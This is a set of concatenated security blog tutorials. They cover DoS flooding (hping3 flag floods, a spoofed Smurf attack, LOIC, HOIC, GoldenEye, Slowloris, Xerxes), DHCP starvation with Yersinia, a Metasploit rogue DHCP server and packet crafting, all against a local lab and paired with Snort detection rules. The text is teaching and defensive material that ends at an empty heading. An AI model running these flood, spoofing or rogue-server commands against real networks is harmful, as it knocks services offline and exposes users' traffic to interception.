From given below image you can observe wireshark has captured UDP packets from 192.168.1.105 to 192.168.1.107

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for UDP Flood Dos attack. Hence you can block attacker’s IP to protect your network from further scanning.

SYN_FIN Flood

Now again open local rule files for generating alert for some combination of flags such as SYN-FIN packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “SYN-FIN Flood Dos”; sid:1000001; flags:SF;)

Above rule will monitor incoming TCP-SYN/FIN packets on 192.168.1.107 by generating alert for it as “SYN-FIN Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -SF –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless SYN-FIN packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “SYN-FIN Flood Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

PUSH_ACK Flood

Now again open local rule files for generating alert for some combination of flags such as PSH-ACK packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “PUSH-ACK Flood Dos”; sid:1000001; flags:PA;)

Above rule will monitor incoming TCP-PSH/ACK packets on 192.168.1.107 by generating alert for it as “PUSH-ACK Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -PA –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless PSH-ACK packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “PUSH-ACK Flood Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Reset Flood

Now again open local rule files for generating alert for Reset flag packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “Reset Dos”; sid:1000001; flags:R;)

Above rule will monitor incoming TCP-RST packets on 192.168.1.107 by generating alert for it as “Reset  Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -R –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless RST (Reset) packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “Reset Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

FIN Flood

Now again open local rule files for generating alert for Fin flag packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “FIN Dos”; sid:1000001; flags:F;)

Above rule will monitor incoming TCP-RST packets on 192.168.1.107 by generating alert for it as “FIN Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -F –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless FIN (Finished) packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “FIN Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Smruf Attack

Smurf attack is DDOS attack in which large numbers of Internet Control Message Protocol packets are used to generate a fake Echo request (icmp type : 8) containing a spoofed source IP which is actually the target network address. This request packet is then is transmitted to all of the network hosts on the network and then each host sends an ICMP response to the spoofed source address (target IP).  The target’s computer will be flooded with traffic; this can slow down the target’s computer and make it unable for other users.

Now again open local rule files for generating alert for ICMP packets and enter given below rule and save the file.

alert icmp any any -> any any (msg: “Smruf Dos Attack”; sid:1000003;itype:8;)

Above rule will monitor ICMP packets on 192.168.1.103 by generating alert for it as “Smurf Dos Attack”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic ICMP flood for target’s network to slow down network services for other users.

hping3 –icmp –flood -c 1000 –spoof 192.168.1.103 192.168.1.255

Above command will generate fake ICMP echo request packet containing a spoofed source IP: 192.168.1.103 which is basically our victim’s network and this request packet is then is transmitted to host’s network on 192.168.1.255 and then this host sends an ICMP response to the spoofed source address which our victim’s machine in IDS mode.

From given below image you can observe it is showing source machine 192.168.1.103 sending  icmp echo request packet to 192.168.1.255 but as we know in actually attacker is main culprit behind this senario.

Come back to over your target machine where you will notice that snort is capturing all the traffic flowing from 192.168.1.103 to 192.168.1.255 and generating alerts for “Smurf Dos Attack” which means is our machine (victim’s machine) is pinging other host machine of that network. Therefore the network administrator should be attentive with this kind of traffic and must check the system activity and legitimate ICMP request of packet of his network.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post DOS Attack Penetration Testing (Part 1) appeared first on Hacking Articles.

In our previous “DOS Attack Penetration testing” we had described about several scenario of DOS attack and receive alert for Dos attack through snort. DOS can be performed in many ways either using command line tool such as Hping3 or GUI based tool. So today you will learn how to Perform Dos attack using GUI tools as well as command line tool and get an alert through snort.

Let start!!

TCP Flood Attack  using LOIC

As we have discribed in our both article Part 1 and part 2 that in target system Snort is working as NIDS for analysing network traffic packets.  Therefore first we had build a rule for in snort to analysis random TCP packets coming in our network rapiditly.

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

alert TCP any any -> 192.168.1.10 any (msg: “TCP Flood”; sid:1000001;)

Above rule will monitor incoming TCP packets on 192.168.1.10 by generating alert for it as “TCP Flood”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

LOIC: It stands for low Orbit iron cannon which is GUI tool developed by Praetox Technologies which is network stress testing tool. We had used it only for educational purpose in our local network, using it over public sector will consider as crime and take as illegal job.  Download it from Google.  

We had downloaded LOIC in our Windows system run the setup file for installation. Start the tool follow the given below step:

Select your target: Here we will go with IP option and enter the victims IP: 192.168.1.10 then click on Lock on tab.

Attack Option: Enter port no. and select method such as TCP and enter no. of threads. If you want to wait for reply packet from victim’s network then enable the check box else disable it.

Adjust the scale:  Drawn the cursor left or right for setting the speed of your TCP packet either faster or slower mode.

Attack status: describe the attack state such as connecting or request or etc.

Ready:  Now click on IMMA CHARGIN MAH LAZER to launch the DOS attack and click on stop flood In order to stop DOS attack.

We are involving wireshark in this tutorial so that you can clearly see the packet sends from attacker network to targets network. Hence in given below image you can notice endless TCP packet has been sent on target’s network. It is considered as Volume Based DOS Attack which floods the target network by sending infinite packets to demolish its network for other legitimate users.

Return to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.16) to protect your network from discard all further coming packets toward your network.

UDP Flood Attack  using LOIC

I think now everything is clear to you how you can build rule in snort get alert for suspicious network again repeat the same and  execute given below command in ubuntu’s terminal to open snort local rule file in text editor and add rule for UDP flood.

sudo gedit /etc/snort/rules/local.rules

alert UDP any any -> 192.168.1.10 any (msg: “UDP Flood”; sid:1000003;)

Above rule will monitor incoming UDP packets on 192.168.1.10 by generating alert for it as “UDP Flood”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Repeat the whole steps as done above only change the method attack option choose UDP method and launch the DOS attack on target IP. You can set any set number of threads for attack since it is tutorial therefore I had set 20 for UDP. It is considered as Volume Based DOS Attack which floods the target network by sending infinite packets to demolish its network for other legitimate users.

Return to over your target machine where you will observe that snort is precisely capturing all in coming traffic in same way, here you will observe that it is generating alerts for “UDP Flood”.  Hence again you can block attacker’s IP (192.168.1.16) to protect your network from discard all further coming packets toward your network on port 80.

TCP Flood Attack  using HOIC

Next we are using HOIC which is alos GUI tool for tcp attack and if you remember we ahd already configure TCP flood rule in our local rule file. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

HOIC: It stands for higher orbit ion cannon developed by Praetox Technologies which is network stress testing tool. We had used it only for educational purpose in our local network, using it over public sector will consider as crime and take as illegal job. Download it from Google.

We had downloaded HOIC in our Windows system run the setup file for installation. Start the tool follow the given below step:

Add the target by making Click on plus symbol “+”

A list of attack option will get pop up as shown in given below image and follow the given below step:

 URL: Enter your target network address as http://192.168.1.10

Power: Low/medium/high to decide the speed of packet to bent to target machine.

At last click on Add.

From give below image you can check status of attack “ready”, now set number of threads and then click on FIRE THE LAZER tab to lunch the dos attack.

You can clearly observe the TCP packet is sending from attacker network to targets network. In given below image you can notice the endless TCP packet has been sent on target’s network using TCP Flags such as SYN/RST/ACK. It is considered as Volume Based DOS Attack which floods the target network by sending infinite packets to demolish its network for other legitimate users.

Return to over your target machine where you will notice that snort is capturing all in coming traffic exactly in same way as above, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.11) to protect your network from discard all further coming packets toward your network on port 80.

GoldenEye

Goldeneye is command line tool use for security testing purpose we had used only for tutorial don’t use it over public sector it will consider as crime and take as illegal job. Execute given below in your kali Linux to download it from github.

git clone https://github.com/jseidl/GoldenEye.git

Now give all permission to the python script and execute given below command for Launching DOS attack on target network. Basically goldeneye is used for HTTP dos testing for testing any webserver network security.

 ./goldeneye.py http://192.168.1.10

Using wireshark you can observe the flow of traffic between victim and attacker network. So if notices given below image then you will find that first attacker (192.168.1.103) sends TCP syn packet for establishing connection with victim’s network then attacker is sending http packet over victim’s network.

Here you will observe that it is generating alerts for “TCP Flood” since port is 80 follow TCP protocol therefore snort captured the traffic generated by goldeneyes. Hence you can block attacker’s IP (192.168.1.103) to protect your network from discard all further coming packets toward your network on port 80.

Slowloris

Slowloris is command line tool use for security testing purpose we had used only for tutorial don’t use it over public sector it will consider as crime and take as illegal job. Execute given below in your kali Linux to download it from github.

git clone https://github.com/llaera/slowloris.pl.git

Now give all permission to the perl script and execute given below command for Launching DOS attack on target network.

perl slowloris.pl -dns 192.1681.10

Using wireshark you can observe the flow of traffic between victim and attacker network. So if notices given below image then you will find that first attacker (192.168.1.103) sends TCP syn packet for establishing connection with victim’s network then victim’s is sending SYN,ACK packet over attacker’s network and then attacker sends ACK packet and this will keep on looping.

Return to over your target machine where you will notice that snort is capturing all in coming traffic exactly in same way as above, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.11) to protect your network from discard all further coming packets toward your network on port 80.

Xerxes

Xerxer is command line tool use for security testing purpose we had used only for tutorial don’t use it over public sector it will consider as crime and take as illegal job. Execute given below in your kali Linux to download it from github.

git clone https://github.com/zanyarjamal/xerxes.git

Since it is written in c language there we need to compile it using gcc as shown in given below command and run then run the script in order to launch DOS attack.

gcc xerxes.c -o xerxes

./xerxes 192.168.1.10 80

You can clearly observe the TCP packet is sending from attacker network to targets network. In given below image you can notice the endless TCP packet has been sent on target’s network using TCP Flags such as SYN/ACK/PSH. These packet are sent in a loop between attacker can target network.

Return to over your target machine where you will notice that snort is capturing all in coming traffic exactly in same way as above, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.11) to protect your network from discard all further coming packets toward your network on port 80.

Well in this tutorial we had use most powerful top 5 tool for DOS attack.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post DOS Attack Penetration Testing (Part 2) appeared first on Hacking Articles.

DHCP stands for Dynamic Host Configuration Protocol and a DHCP server dynamically assigns an IP address to enable hosts (DHCP Clients). Basically DHCP server reduce the manually effort of administer of configuring IP address in client machine by assign a valid IP automatically to each network devices. A DHCP is available for distributing IP address of any Class among: A B C D E basis on their netmask description which means it is applicable even for small network or a huge network.

DHCP uses UDP as its transport protocol. The client sends messages to the server on port 67 and the server sends messages to the client on port 68.

There are three mechanisms used to assign an IP address to the client. They are:

• Automatic allocation – DHCP assigns a permanent IP address to a client
• Manual allocation – Client’s IP address is assigned by the administrator, DHCP conveys the address to the client.
• Dynamic allocation– DHCP assigns an IP address to the client for a limited period of time (lease).

Mode of Operation DHCP server and DHCP Client

• DHCP Discover: DHCP client broadcast a DHCP discover message to DHCP server for an IP address lease request through subnet mask for e.g. 255.255.255.255.
• DHCP Offer: DHCP server receives DHCP Discover message for an IP address lease form DHCP client and reserve IP for it and send DHCP OFFER message to DHCP Client for IP lease.  
• DHCP Request: DHCP client broadcast a message to DHCP server for acceptance of IP by receiving Offered IP packets and make DHCP request for IP parameter configuration.
• DHCP Acknowledgment: DHCP server receives DHCP client request for IP configuration process and as responds DHCPACK message sent to client with committed IP address and its configuration and with some additional information such lease time of offered IP.
• DHCP Release: DHCP client sends a DHCP Release packet to the DHCP server to release the IP address.

DHCP Starvation Attack

A DHCP starvation attack may also categories as DHCP DOS attack where the attacker broadcasting fake DHCP requests with spoofed MAC addresses. If official replies to this fake request then it can exhaust the address space available to the DHCP servers for a period of time. This can be performed by using attacking tools such as “Yersinia”.

Now attacker may place rouge server in the network and respond to new DHCP requests from clients.

Form given below image you can observe that by executing given command we discovered bind hardware with our official router. Here we had used CISCO router for DHCP penetration testing.

ip  dhcp binding

Launch DHCP Starvation Attack using Yersinia

Yersinia is a network tool designed to take advantage of some weakness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

Currently yersinia supports:

Spanning Tree Protocol (STP)

Cisco Discovery Protocol (CDP)

Dynamic Trunking Protocol (DTP)

Dynamic Host Configuration Protocol (DHCP)

Hot Standby Router Protocol (HSRP)

IEEE 802.1Q

IEEE 802.1X

Inter-Switch Link Protocol (ISL)

VLAN Trunking Protocol (VTP)

From http://www.yersinia.net/

By default in Kali Linux installed yersinia is available for DHcp penetration testing, open the terminal and execute given command which will open yersinia in GUI mode as shown in given below image.

yersinia -G

You will observe few tabs in menu bar click on launch attack; a small window will pop up for choosing protocol for attack  here we had select DHCP, now enable the option for sending  DISCOVER packet.

Now it will start sending Discovered packet to the router for release IP for each of its fake Discover message as shown in given image.

From given below image you can observe wireshark has capture the DHCP packet where the attacker machine as source 0.0.0.0 is broadcasting DISCOVER message to Destination on 255.255.255.255. This is DHCP starvation attack which also considered as DHCP Dos attack because its send Discover message infinitely in network to block the responded server for other genuine request from other DHCP client.

Now when again you will check our router IP table then you will observe that all IP is allocated on some different-different Hardware address as shown in given below image.

Rogue DHCP Server

A rough DHCP server is a forged server of attacker which is place in a local network for stealing information that is being shared among several clients. After DHCP starvation attack, the official DHCP server is unable to Offer IP to DHCP client. Therefore when a client release its old IP and request new IP by broadcasting DHCP Discover message then rough server offer an IP as responds to the DHCP client and hence Client request for IP configuration from fake server and get trap into fake network. Now if client is transferring any information over fake network that can easily sniff by rough server. 

Form given below image you check attacker’s machine IP is 192.168.1.104 which will reflect as DNS address in victim’s machine (Windows’s).

Now open the terminal and type “msfconsole” for metasploit framework and execute given below commands which will create your Rouge server in the network.

use auxiliary/server/dhcp

msf auxiliary(dhcp) > set srvhost 192.168.104

msf auxiliary(dhcp) >set netmask 255.255.255.0

msf auxiliary(dhcp) >set DHCPIPSTART 192.168.1.200

msf auxiliary(dhcp) >set DHCPIPEND 192.168.1.205

msf auxiliary(dhcp) >Exploit 

If you perceive above command then you will find that it will Start DHCP service and behave like a DHCP server which will offer Class C IP to official DHCP client form specified pool between 192.168.1.200 to 192.168.1.205.

Now turn on any another system in network and check its IP configuration.

Let’s study the given image where attack is broadcasting Offer packet in the network and then in 2^nd packet we saw DHCP ACK which means some DHCP client ask for offered IP configuration then we can see DNS query send from an IP 192.168.1.202 to 192.168.1.104.

Form given below image you can observed that 192.168.1.202 IP is allocated to ubuntu which is official DHCP client. Now if client is transferring any information over fake network that can easily sniff by rough server.  For detail read our previous article “Comprehensive guide on sniffing”

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post DHCP Penetration Testing appeared first on Hacking Articles.

In this tutorial we are going to discuss Packet Crafting by using a great tool Colasoft packet builder which is quite useful in testing strength of Firewall and IDS and several servers against malicious Flood of network traffic such as TCP and UDP Dos attack. This tool is very easy to use especially for beginners.

Packet crafting is a technique that allows network administrators to probe firewall rule-sets and find entry points into a targeted system or network. This is done by manually generating packets to test network devices and behavior, instead of using existing network traffic. Testing may target the firewall, IDS, TCP/IP stack, router or any other component of the network. Packets are usually created by using a packet generator or packet analyzer which allows for specific options and flags to be set on the created packets. The act of packet crafting can be broken into four stages: Packet Assembly, Packet Editing, Packet Play and Packet Decoding.

For more detail visit Wikipedia.org

Mode of Operation

Packet Assembly: It is the initial state of packet crafting where tester needs to decide the network that can be compromise easily by creating a packet which can exploit the network by shooting its vulnerability. The packet should be design in a manner that it maintains its ability to being undetectable in target’s network.

Famous Tools for Packet Assembly are: Hping3 and Yersinia   

Packet Editing: In this stage captured packet is edited or modified which cannot be possible to do in Packet Assembly phase. In this phase packet is edited in a manner that it can dump more and more information of target’s network by making small amount of change in it. For example change data length (payload) of packets.

Famous Tool of packet Editing: Colasoft and Scapy   

Packet Playing: In this phase when packet is ready to launch then it sends to target’s network for exploiting its network and collect the information. This is the actual arena where above both actions is tested and if packet is failed to complete its goal of retrieving victim’s information or exploit its vulnerability then again the packet send back to Packet Editing phase for modification.

Packet Analysis: This is the last stage where packet is analysis when it received on targeted network. The captured packet is decoded for further investigating for retrieving its internal details which can speak up its goal for establishing connection on target’s network.

Famous Tool of Packet Analysis: wireshark and Tcpdump

Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.

Users are also able to edit decoding information in two editors – Decode Editor and Hex Editor. Users can select one from the provided templates Ethernet Packet, ARP Packet, IP Packet, TCP Packet and UDP Packet, and change the parameters in the decoder editor, hexadecimal editor or ASCII editor to create packets. Any changes will be immediately displayed in the other two windows. In addition to building packets, Colasoft Packet Builder also supports saving packets to packet files and sending packets to network.

From:  http://www.colasoft.com/packet_builder/

Let’s start!!!

TCP Packet Crafting

You can download it from above given link, once it get downloaded then run the applictaion as administrator to begin with crafting various Packets. As I had example above a packet crafting involves 4 phases, lets  start it by adding the packet which we will craft for testing our newtork.

Click on ADD given in menu bar.

A small window will pop up to select mode of IP packet to be crafted. Here we are going to choose TCP packet for crafting for example by increasing the size of the packet or by sending the individual flag of the Tcp Protocol to the destination IP address. Well if you will notice given below image then you will observe that I had set delta time 0.1 sec as time elapse for flow of traffic for all crafted packets. The delta time is the time gap between the each packet.

Window is categories into three phases as Decode Editor, Hex Editor and packet List. From given image you can observe following information which I had edited for TCP packet

Decode Editor: This section contains packet information such as protocol, Time to live and etc. Here you need to add source address responsible for sending packet and then add destination address which is responsible for receiving incoming packet traffic.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Hex Editor:  This section displays the raw information (Hexa decimal) releated to the data size of the packet. By typing random string you can increase the size of the packet.

Packet size: 77 bytes

This phase is also known as Packet Editing mode where we can modify our packet.

Packet List: It displays complete information of your packet which contains source address, destination address, time to live and and other information which we had edited.

Click on Adpter  given in the menu bar to select specific adpter from which packets will be sent. From given below image you can observe it, it showning adapter status: LAN Operational.

Note: It is only availabe when you have run the application as adminsitrator.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packets to be sent to the Destination Network and the delay time gap between the each packets.

Then click on start to send the TCP packets. This phase is know as Packet playing mode where are ready to sent packet on target netwok.

Using wireshark we can capture packet and traffic between source and destination. So here you can perceive that infinite TCP packet is being transferring to target’s network. This phase is known as packet analysis mode where sent packet is sniff or analysis for identifying sender objectives behind sending the packet.

ARP Packet Crafting

Again repeat the same to choose ARP packet for crafting Packet for ARP protocol on target’s network. Well if you will notice given below image again then you will observe that I had set same delta time 0.1 sec.

Apart from editing source and destination IP here we need to add source and destination physical address also.

Hence this time I had set below information in decoder Editor and Hex editor.

Source MAC: AA:AA:AA:AA:AA:AA

Source address: 192.168.1.102

Destination MAC: BB:BB:BB:BB:BB:BB

Destination address: 192.168.1.107

Packet size: 78 bytes

You can use any method to find destination MAC address.

After editing your packet information verifies that changes through packet list given on right side of window before sending the packet. If you notice given image below then you can read the summary where it is show broadcasting ARP message who is 192.168.1.107?

Click on Adpter  given in menu bar to select specific adpter for network selection. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packet to be sent to the Destination network according to your wish.

Then click on start to launch sending process of ARP packet. This action is known as Packet playing.

From the given image below you can observe the continue ARP packet making request for who is 192.168.1.107, which meaning our packet playing is gives positive result. From wireshark target is able to analysis the goal of packet received from sender’s network.

IPv4 Packet Crafting 

Again repeat the same process to choose IP packet for crafting Packet for IPv4 protocol on target’s network. Again if you will notice given below image again then you will observe that I had set same delta time 0.1 sec.

This time I had set below information in decoder Editor and Hex editor for Editing Packet.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Packet size: 71 bytes

After editing your packet information verifies that changes through packet list given on right side of window before sending the packet.

Click on Adpter  given in menu bar to select specific adpter for sending the packet. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packet to be sent to the Destination network according to your wish.

Then click on start to send the IPv4 packet.

You can clearly observe in given below image the flow of traffic of IPv4 packets from senders network to Receivers network in packet analyzing mode.

UDP Packet Crafting

Again repeat the same to choose UDP packet for crafting UDP Packet. If you will notice given below image then you will observe that again I had set delta time 0.1 sec as time elapse for flow of traffic for all packets.

This time I had Editied below information in decoder Editor and Hex editor for desigining my packet.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Packet size: 72 bytes

After editing your packet information verifies that changes through packet list given on right side of window.

Click on Adpter to select specific adpter for sending the packets. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packet to be sent to the Destination network according to your wish.

Then click on start button to sending the crafted UDP packet.

You can clearly observe in given below image the flow of traffic of UDP packets from senders network to the Receivers network.

Hence in this tutorial we tried to explain all for mode of operation of crafting a packet for testing a network using colasoft and wireshark.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post Packet Crafting with Colasoft Packet Builder appeared first on Hacking Articles.

In our previous article we had discuss “packet crafting using Colasoft Packet builder”  and today you will DOS attack using colasoft Packet builder. In DOS penetration testing part 1 we had used Hping3 in Kali Linux for generating TCP, UDP, SYN, FIN and RST traffic Flood for DOS attack on target’s network. Similarly we are going to use colasoft for all those attack by making change in their data size of packets and time elapse between packets.

Let’s start!!!

TCP DOS Attack

You can download it from given link, once it get downloaded then run the applictaion as admionistrator to begin the DOS attack.

Click on ADD given in menu bar.

A small window will pop up to select mode of attack here we are going to choose TCP packet for generating TCP packet flood on target’s network. Well if you will notice given below image then you will observe that I had set delta time 0.1 sec as time elapse for flow of traffic for all packets.  This is because as much as the time elapse will be smaller as much as packet will be sent faster on target’s network.

Window is categories into three phases as Decode Editor, Hex Editor and packet List. From given image you can observe following information which I had edited for TCP packet

Decode Editor: This section contains packet information such as protocol, Time to live and etc. Here you need to add source address responsible for sending packet and then add destination address which is responsible for receiving incoming packet traffic.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Hex Editor:  This section displays the raw information (Hexa decimal) releated to the data size of the packet. By typing random string you can increase the data length of the packet.

Packet size: 112 bytes

Packet List: It displays complete information of your packet which contain source address and destination address, time to live and and other information which we had edited.

Click on Adapter  gien in menu bar to select specific adpter for DOS attack. From given below image you can observe it  showning adapter status: LAN Operational.

Note: It is only availabe when you have run the application as adminsitrator.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch TCP packet for DOS attack.

Using wireshark we can capture packet and traffic between source and destination. So here  you can perceive that infinite TCP packet is being transferring on target’s network, after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

TCP SYN DOS Attack

Again repeat the same to choose TCP packet for generating TCP SYN flood on target’s network. Well if you will notice given below image again then you will observe that I had set same delta time 0.1 sec.

You people must aware of TCP-SYN Flood attack so in oder to generate only SYN packet traffic, activate TCP flag for synchronize sequence by changing bit form 0 to 1.

Hence this time I had set below information in decoder Editor and Hex editor.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Flag: SYN

Packet size: 115 bytes

And repeat above step of TCP flood to begin the attack.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch TCP packet for DOS attack.

You can clearly observe the flow of traffic of SYN packet from attacker network to targets network, after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

TCP RST DOS Attack

Again repeat the same to choose TCP packet for generating TCP Reset flood on target’s network. If you will notice given below image then you will observe that again I had set delta time 0.1 sec  this is because as much as the time elapse will be smaller as much as packet will be sent faster on target’s network.

You people must aware of TCP-RST Flood attack so in oder to generate only Reset packet traffic, activate TCP flag for Reset the connection by changing bit form 0 to 1.

Hence this time I had set below information in decoder Editor and Hex editor.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Flag: Reset

Packet size: 104 bytes

After then repeat above step to begin the attack.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch TCP packet for DOS attack.

You can clearly observe the flow of traffic of RST packet from attacker network to targets network, after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

UDP DOS Attack

Again repeat the same to choose UDP packet for generating TCP flood on target’s network. If you will notice given below image then you will observe that again I had set delta time 0.1 sec as time elapse for flow of traffic for all packets.

This time I had set below information in decoder Editor and Hex editor.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Source port: 80

Packet size: 113bytes

After editing your packet information verifies that changes through packet list given on right side of window before launching attack.

Click on Adpter to select specific adpter for DOS attack. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch UDP packet for DOS attack.

You can clearly observe in given below image the flow of traffic of UDP packets from attacker network to targets network after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post DOS Attack with Packet Crafting using Colasoft appeared first on Hacking Articles.

Hello friends ! in our previous article we had described packert crafting using colasoft packet builder. Again we are going to use a new tool “Cat KARAT”for packet crafting to test our network  by crafting various kind of network packet.

Cat Karat Packet Builder is a is a handy, easy to use IP4, IP6, IP4/IP6 tunnels, PPoE, TCP, UDP, ICMPv4, ICMPv6, VRRP, IGMP, ARP, DHCP , OAM, VLAN (Q in Q), MPLS, Spanning tree BPDU and LLDP packet generation tool that allows to build custom packets for firewall or target testing and has integrated scripting ability for automated testing.

This Packet Builder enables the user to specify the entire contents of the packet from the GUI. In addition to building packets. Packet Builder also supports saving packets to packet files and sending packets to network. It can be used at all kinds of network areas like traffic generator, packet generator or protocol simulator.

This project also provides a packet capture tool. It is designed for use by anyone who wants to inject packets into a network and/or observe packets exiting a network. Usually packet operation by following protocol stack is limited to command line interface. With this tool, all user have to do is clicking the screen, which almost everybody can do

 From: http://packetbuilder.net

You can download it from given link above.

Let’s start!!

As we had discuss in our previous article that there are 4 mode of operation in packet crafting.

1. Packet Assembly
2. Packet Editing
3. Packet Playing
4. Packet Analysis

Let start from first phase is “Packet Assembly” where you need to decide type of packet and network you want to created among TCP, IP, ICMP and UDP.

Now when you will run the installed application “Cat KARAT” you will observe three important sections “Interfaces”, “Packet flow” and Packet view  which in their default state as shown in given below image.

TCP-SYN Packet Crafting

So as we know in Packet Assembly phase we need to decide protocol for crafting any packet, which is quite easy to select with this tool. Only enable the radio button for selecting protocol and direction flow of packet. Here I had enable radio buttons for “IPv4” and “TCP” without disturbing remaining default packet flow as shown given below image.

Next we need to select the interface which you can select from the second sections of Interfaces by double-Click on it.

Now next is packet Editing phase where you need to specify source IP address such as: 192.168.1.11 from which packet will be sent and Destination IP address such as: 192.168.1.12 on which packet is received. Moreover you can also make some changes in your packet such as Time to live (TTL), Data length and also can go with packet fragmentation.

From given below image you can observe I had added source and destination IP in packet under the third section protocol view -> Ipv4

As we know TCP protocol use TCP-flag for communication to established connection with Destination IP. Therefore we are crafting TCP-SYN packet under the third section protocol view -> TCP by enabling sync sequence option which flow from source port 80 to destination port 80.

Once everything is edited then your packet is ready to send on target network.

Click on play button given in menu bar for sending packet on target’s network.

As we know after finishing packet editing operation we need to send it on target network which is known as “Packet Playing” in this mode we actually test packet Assembly and packet Editing mode if show packet is send successfully else again we send packet in packet Editing mode for modification.

From given below image you can observe the result “Packet sent successfully”

Last phase is Packet Analysis mode where received packet is analysis using packet analysis tool. Here we had use wireshark for capturing incoming traffic. Hence from given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as TCP protocol and TCP-SYN packet.

TCP-RST Packet Crafting

